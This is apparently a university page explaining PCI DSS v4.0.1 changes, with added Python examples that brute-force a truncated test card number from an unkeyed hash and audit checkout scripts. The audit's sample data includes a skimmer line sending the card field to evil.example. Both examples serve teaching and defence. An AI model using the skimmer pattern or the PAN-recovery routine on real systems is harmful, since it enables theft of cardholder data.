Payment Card Industry Data Security Standards (PCI DSS)

PCI DSS Compliance

PCI DSS is a set of technical and operational requirements established by the PCI Security Standards Council to safeguard cardholder data. Compliance is enforced by the payment card brands (through their acquiring banks) and applies to every organization that stores, processes, or transmits cardholder data.

At UC Davis, we take PCI DSS compliance seriously and have implemented measures to protect cardholder data. Failure to comply with any of the PCI DSS requirements may result in:

  • Fines and penalties
  • Diminished sales
  • Lawsuits
  • Reputational damage
  • Higher subsequent costs of compliance

PCI DSS v4.0.1

PCI DSS v4.0 was a significant update to the global standard for payment security, addressing emerging threats and technologies to better protect payment data. v4.0.1, published in June 2024, is a limited revision that corrects and clarifies v4.0 without adding or removing requirements. The v4.0 release followed extensive feedback from the global payments industry, with over 200 organizations providing more than 6,000 items of feedback over three years.

Key Changes and Impact:

Customized Approach:

  • Change: Introduction of a customized approach for meeting security objectives, allowing organizations to use innovative methods and technologies to meet the intent of PCI DSS requirements.
  • Impact: Provides greater flexibility for organizations to implement security measures that best fit their unique environments and risk profiles.

Expanded Multi-Factor Authentication (MFA):

  • Change: Expansion of MFA requirements to cover all access into the cardholder data environment (requirement 8.4.2), not only remote access and non-console administrative access as in v3.2.1.
  • Impact: Enhances the security of access controls, reducing the risk of unauthorized access to sensitive cardholder data.

Continuous Compliance:

  • Change: Emphasis on security as an ongoing process, encouraging organizations to continuously monitor and improve their security posture.
  • Impact: Promotes a proactive approach to security, helping organizations stay ahead of evolving threats.

Stronger Encryption Standards:

  • Change: Updated cryptographic requirements for cardholder data in storage and in transit. For example, hashes used to render PAN unreadable must be keyed cryptographic hashes of the entire PAN (requirement 3.5.1.1), disk- or partition-level encryption alone is no longer sufficient on non-removable media (3.5.1.2), and sensitive authentication data stored before authorization must be encrypted with strong cryptography (3.3.2).
  • Impact: Enhances data protection, reducing the risk of data breaches and unauthorized access.
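
To show why the keyed-hash requirement (3.5.1.1) matters, here is an added example that is not part of this page or of any PCI SSC material. It hashes a well-known test PAN with plain SHA-256 and with HMAC-SHA256, then plays an attacker who has obtained the digest together with a truncated PAN (first eight and last four digits, a truncation PCI DSS permits for 16-digit PANs) and enumerates the four unknown digits. The function names, the constructed key and the sample PAN are assumptions for illustration.

```python
import hashlib
import hmac
from typing import Callable, Optional

# Constructed sample: a well-known test card number, not a real account.
SAMPLE_PAN = "4111111111111111"


def luhn_ok(pan: str) -> bool:
    """Luhn check-digit validation; an attacker uses it to skip impossible PANs."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def unkeyed_hash(pan: str) -> str:
    """The pre-v4 pattern: SHA-256 of the PAN with no secret. Anyone can
    recompute it, so it is only as strong as the guessable PAN space."""
    return hashlib.sha256(pan.encode()).hexdigest()


def keyed_hash(pan: str, key: bytes) -> str:
    """Keyed cryptographic hash (HMAC-SHA256) as requirement 3.5.1.1 demands.
    Without `key` an attacker cannot compute digests to test candidate PANs."""
    return hmac.new(key, pan.encode(), hashlib.sha256).hexdigest()


def recover_pan(target_digest: str, first8: str, last4: str,
                guess_fn: Callable[[str], str]) -> Optional[str]:
    """Attacker model: the digest and a truncated PAN (first 8 + last 4 digits)
    leak together, so only the four middle digits are unknown. Enumerate all
    10,000 candidates (fewer after Luhn filtering) and compare digests."""
    for middle in range(10_000):
        candidate = f"{first8}{middle:04d}{last4}"
        if not luhn_ok(candidate):
            continue
        if guess_fn(candidate) == target_digest:
            return candidate
    return None


if __name__ == "__main__":
    # Hypothetical key; in production it lives in an HSM or key-management
    # service with the key-management processes 3.5.1.1 also requires.
    key = hashlib.sha256(b"hypothetical HSM-backed key").digest()
    leaked_plain = unkeyed_hash(SAMPLE_PAN)
    leaked_keyed = keyed_hash(SAMPLE_PAN, key)
    # Unkeyed digest plus truncated PAN: the full PAN comes back instantly.
    print("unkeyed:", recover_pan(leaked_plain, "41111111", "1111", unkeyed_hash))
    # Keyed digest: the attacker has no key, so no candidate ever matches.
    print("keyed:  ", recover_pan(leaked_keyed, "41111111", "1111", unkeyed_hash))
```

This is also why requirement 3.5.1 says a hashed PAN and a truncated version of the same PAN must not be correlatable: with an unkeyed hash the pair is the full PAN. Against the keyed digest the attacker would have to guess the 256-bit key as well, which is not feasible.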

Support for Cloud Environments:

  • Change: New requirements and guidance for securing cardholder data in cloud environments.
  • Impact: Addresses the increasing use of cloud services, ensuring that cardholder data remains secure in these environments.

Greater Emphasis on Risk Assessments:

  • Change: Increased focus on risk analysis: a formal enterprise-wide risk assessment, plus targeted risk analyses (requirement 12.3.1) that document and justify how often an organization performs activities the standard leaves to its discretion.
  • Impact: Helps organizations identify vulnerabilities and implement appropriate security measures to mitigate risks.

Updated Terminology:

  • Change: Changes in terminology, such as updating "firewall" to "network security controls," to encompass a broader range of technologies.
  • Impact: Ensures the standard remains relevant and applicable to modern technologies and security practices.

Payment Page Script Security:

  • Requirement: Ensure that every script loaded and executed on the payment page is authorized and its integrity is assured, with a documented inventory and written justification for each script (requirement 6.4.3), and deploy a change- and tamper-detection mechanism that alerts on unauthorized modification of the HTTP headers and script content the consumer's browser receives (11.6.1).
  • Impact: Protects against web skimming, e-skimming, and form-jacking attacks.
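
As an added illustration (not code from this page or from the PCI SSC), the following audit compares the scripts a checkout page actually references against a documented inventory of authorized scripts and their approved hashes. It flags scripts absent from the inventory, scripts whose served content no longer matches the approved hash, tags without a matching Subresource Integrity attribute, and inline scripts that need review. The page HTML, the script bodies, the URLs and the inventory are all constructed for the example.

```python
import base64
import hashlib
from html.parser import HTMLParser
from typing import Dict, List, Optional, Tuple


def sri_hash(body: bytes) -> str:
    """Subresource Integrity value (sha384, base64) for a script body."""
    return "sha384-" + base64.b64encode(hashlib.sha384(body).digest()).decode()


class _ScriptCollector(HTMLParser):
    """Collects every <script> tag as {src, integrity, inline}."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts: List[Dict[str, Optional[str]]] = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self.scripts.append({"src": a.get("src"), "integrity": a.get("integrity"), "inline": ""})
            self._in_script = True

    def handle_data(self, data):
        if self._in_script and self.scripts and self.scripts[-1]["src"] is None:
            self.scripts[-1]["inline"] += data

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False


def audit_payment_page(html: str, inventory: Dict[str, Dict[str, str]],
                       served: Dict[str, bytes]) -> List[Tuple[str, str]]:
    """Check the scripts on a payment page against the 6.4.3 inventory.
    `inventory` maps script URL -> {justification, sha384}; `served` maps
    script URL -> the body currently delivered (fetched in a real audit).
    Returns (script, finding) pairs."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings: List[Tuple[str, str]] = []
    for s in parser.scripts:
        src = s["src"]
        if src is None:
            findings.append(("<inline>", "inline-script-needs-review"))
        elif src not in inventory:
            findings.append((src, "unauthorized"))          # no inventory entry
        elif src not in served:
            findings.append((src, "not-served"))
        elif sri_hash(served[src]) != inventory[src]["sha384"]:
            findings.append((src, "modified"))              # content drifted
        elif s["integrity"] != inventory[src]["sha384"]:
            findings.append((src, "missing-or-wrong-sri"))  # browser cannot enforce
        else:
            findings.append((src, "ok"))
    return findings


# Constructed approved script bodies, recorded when each script was authorized.
APPROVED = {
    "https://js.psp.example/v3/sdk.js": b"window.PSP = {tokenize: function (f) {}};",
    "https://cdn.example/analytics.js": b"window.track = function (e) {};",
}
INVENTORY = {
    "https://js.psp.example/v3/sdk.js": {"justification": "Card tokenization for checkout",
                                         "sha384": sri_hash(APPROVED["https://js.psp.example/v3/sdk.js"])},
    "https://cdn.example/analytics.js": {"justification": "Conversion analytics",
                                         "sha384": sri_hash(APPROVED["https://cdn.example/analytics.js"])},
}
# Constructed view of what the CDN serves today: analytics.js has been altered
# to exfiltrate the card field, and fonts.js was never authorized.
SERVED = {
    "https://js.psp.example/v3/sdk.js": APPROVED["https://js.psp.example/v3/sdk.js"],
    "https://cdn.example/analytics.js": APPROVED["https://cdn.example/analytics.js"]
    + b"\nfetch('https://evil.example/c?d=' + document.forms[0].card.value);",
    "https://cdn.example/fonts.js": b"/* injected, not in inventory */",
}
CHECKOUT_HTML = f"""<html><head>
<script src="https://js.psp.example/v3/sdk.js" integrity="{INVENTORY['https://js.psp.example/v3/sdk.js']['sha384']}" crossorigin="anonymous"></script>
<script src="https://cdn.example/analytics.js" integrity="{INVENTORY['https://cdn.example/analytics.js']['sha384']}" crossorigin="anonymous"></script>
<script src="https://cdn.example/fonts.js"></script>
<script>console.log("inline bootstrap");</script>
</head><body><form><input name="card"></form></body></html>"""

if __name__ == "__main__":
    for script, finding in audit_payment_page(CHECKOUT_HTML, INVENTORY, SERVED):
        print(f"{finding:28s} {script}")
```

A browser enforcing the integrity attribute would already refuse the modified analytics.js; the audit is what tells the inventory owner that it happened, and it is the only control that catches fonts.js, which carries no integrity attribute at all. Running this against the live page on a schedule, together with alerting on header or script changes, is one way to satisfy 11.6.1.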

Enhanced Web Protection:

  • Requirement: Deploy an automated technical solution, such as a Web Application Firewall (WAF), that continually detects and prevents web-based attacks against public-facing web applications (requirement 6.4.2). In v3.2.1 this was an alternative to periodic application vulnerability assessments; in v4.0 it is mandatory.
  • Impact: Provides an additional layer of security to protect against web-based attacks.

Automated Audit Log Reviews:

  • Requirement: Use automated mechanisms to review audit logs and detect and respond to security incidents (requirement 10.4.1.1).
  • Impact: Improves the ability to identify and respond to potential security breaches.

Authenticated Internal Vulnerability Scans:

  • Requirement: Perform authenticated internal vulnerability scans to identify and address security weaknesses (requirement 11.3.1.2).
  • Impact: Enhances the detection and remediation of vulnerabilities within the internal network.

Management of Cryptographic Keys and Certificates:

  • Requirement: Maintain an inventory of the trusted keys and certificates used to protect PAN during transmission (requirement 4.2.1.1) and of the cipher suites and protocols in use (12.3.3), and ensure proper management and usage.
  • Impact: Strengthens the security of cryptographic processes and protects sensitive data.

No Hard-Coded Passwords:

  • Requirement: Ensure that passwords for application and system accounts are not hard-coded in scripts, configuration or property files, or bespoke and custom source code (requirement 8.6.2).
  • Impact: Reduces the risk of unauthorized access due to exposed credentials.

Security Awareness Program:

  • Requirement: Include training on phishing and social engineering (requirement 12.6.3.1) and on the acceptable use of end-user technologies (12.6.3.2), and review the program at least once every 12 months (12.6.2).
  • Impact: Enhances employee awareness and preparedness against common security threats.